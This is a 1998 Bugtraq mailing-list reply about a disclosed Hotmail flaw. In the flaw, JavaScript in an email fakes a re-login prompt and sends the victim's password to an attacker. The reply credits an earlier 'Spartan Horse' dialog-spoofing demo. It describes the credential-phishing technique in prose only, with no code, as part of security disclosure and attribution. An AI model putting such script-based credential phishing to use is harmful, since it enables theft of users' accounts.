[7742] in bugtraq
Re: Serious Security Hole in Hotmail
daemon@ATHENA.MIT.EDU (Jeff Mcadams)
Tue Aug 25 13:36:14 1998
Date: Tue, 25 Aug 1998 07:38:14 -0400
Reply-To: Jeff Mcadams <jeffm@IGLOU.COM>
From: Jeff Mcadams <jeffm@IGLOU.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <01BDCF6A.8D80E680@bOoNdOcK> from "Tom Cervenka" at Aug 24,
98 02:21:56 pm
Thus spake Tom Cervenka
>We have just found a serious security hole in Microsoft's Hotmail
>service (http://www.hotmail.com) which allows malicious users to easily
>steal the passwords of Hotmail users. The exploit involves sending an
>e-mail message that contains embedded javascript code. When a Hotmail
>user views the message, the javascript code forces the user to re-login
>to Hotmail. In doing so, the victim's username and password is sent to
>the malicious user by e-mail. (see
>http://www.because-we-can.com/hotmail/default.htm for demo)
This is a variation on the Spartan Horse announced by Dan Gregorie over
a week ago, and covered on news.com on the 14th. The Spartan Horse is
available for viewing at:
http://www.thetopoftheworld.com
The news.com articles, is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
The variation is that the Spartan Horse, as design on the
www.thetopoftheworld.com site mimicks the Windows95/98
Dial-Up-Networking dialog box.
This wasn't originally sent to BUGTRAQ because it doesn't exploit a
specific flaw in programming code in any software, like this "Hot"Mail
exploit. Perhaps that was an oversight on Dan's and my fault, but I
did want to set the record straight on the origination of this idea for
Dan's sake.
--
Jeff McAdams Email: jeffm@iglou.com
Head Network Administrator Voice: (502) 966-3848
IgLou Internet Services (800) 436-4456
